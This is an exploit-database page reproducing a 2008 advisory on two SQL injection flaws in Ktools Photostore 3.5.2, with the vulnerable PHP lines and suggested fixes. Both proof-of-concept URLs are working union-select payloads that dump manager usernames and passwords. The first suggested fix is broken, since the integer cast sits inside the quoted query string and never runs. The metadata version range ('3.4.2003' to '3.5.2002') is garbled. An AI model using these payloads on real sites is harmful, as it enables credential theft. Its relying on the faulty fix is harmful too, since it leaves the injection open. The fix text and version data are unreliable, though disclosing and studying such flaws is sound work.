Ktools Photostore - exploit.company

vendor:

Photostore

by:

DNX

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Photostore

Affected Version From: 3.4.2003

Affected Version To: 3.5.2002

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

Ktools Photostore <= v3.5.2 (crumbs.php) Remote SQL Injection

The Ktools Photostore version 3.5.2 is vulnerable to a remote SQL injection attack in the crumbs.php file. This exploit only works when magic quotes are turned off. The vulnerability allows an attacker to inject malicious SQL queries through the 'gid' parameter in the URL, leading to unauthorized access to the database. The exploit was discovered by DNX.

Mitigation:

To mitigate this vulnerability, the vendor should replace the unsecure codeline with a secure one. The suggested fix is to use parameterized queries or input validation to prevent SQL injection attacks. It is recommended to update to a newer version of the software that includes the fix.

Source

Exploit-DB raw data:

                                 \#'#/
                                 (-.-)
   -------------------------oOO---(_)---OOo-------------------------
   | Ktools Photostore <= v3.5.2 (crumbs.php) Remote SQL Injection |
   |              (works only with magic quotes = off)             |
   |                         coded by DNX                          |
   -----------------------------------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.ktools.net
[!] Detected...: 27.04.2008
[!] Reported...: 29.04.2008
[!] Response...: xx.xx.2008

[!] Background.: PhotoStore allows you to setup a complete photo selling 
                 website on your server or hosting space in just minutes.

[!] Price......: $295 Oo.

[!] Bug........: $_GET['gid'] in crumbs.php near line 11

                 05: if($_GET['gid']){
                 
                 08:   function crumbs($gid){
                 09:     global $db, $crumb_array_name, $crumb_array_id;
                 10:     
                 11:     $ca_result = mysql_query("SELECT id,title,nest_under FROM photo_galleries where id = '$gid'", $db);
                 
                 23:   crumbs($_GET['gid']);

                 A direct request on 'crumbs.php' doesn't work, because there is no valid database resource. So we have to look
                 where 'crumbs.php' is included by an other script. In 'about_us.php' for example.

[!] Tested on..: v3.4.3, v3.5.2

[!] PoC........: http://127.0.0.1/photostore/about_us.php?gid=0'%20union%20select%201,concat(username,0x2f,password),3%20from%20mgr_users%20/*

[!] Solution...: Replace the unsecure codeline with:

                 $ca_result = mysql_query("SELECT id,title,nest_under FROM photo_galleries where id = '(int)$gid'", $db);



                                        \#'#/
                                        (-.-)
   --------------------------------oOO---(_)---OOo--------------------------------
   | Ktools Photostore <= v3.5.2 (image_details_editor.php) Remote SQL Injection |
   |                                coded by DNX                                 |
   -------------------------------------------------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.ktools.net
[!] Detected...: 26.04.2008
[!] Reported...: 28.04.2008
[!] Response...: 29.04.2008

[!] Background.: PhotoStore allows you to setup a complete photo selling 
                 website on your server or hosting space in just minutes.

[!] Price......: $295 Oo.

[!] Bug........: $_GET['id'] in manager/image_details_editor.php near line 60

                 $image_result = mysql_query("SELECT * FROM uploaded_images where id =" . $_GET['id'], $db);

[!] Tested on..: v2.5, v2.9.8, v3.1.0, v3.1.1, v3.2.0, v3.2.1, v3.4.0, v3.4.2, v3.4.3, v3.5.0, v3.5.1, v3.5.2

[!] PoC........: http://127.0.0.1/photostore/manager/image_details_editor.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,username,11,12,13,password,15,16%20FROM%20mgr_users

[!] Solution...: Replace the unsecure codeline with:

                 $image_result = mysql_query("SELECT * FROM uploaded_images where id =" . (int)$_GET['id'], $db);

# milw0rm.com [2008-05-10]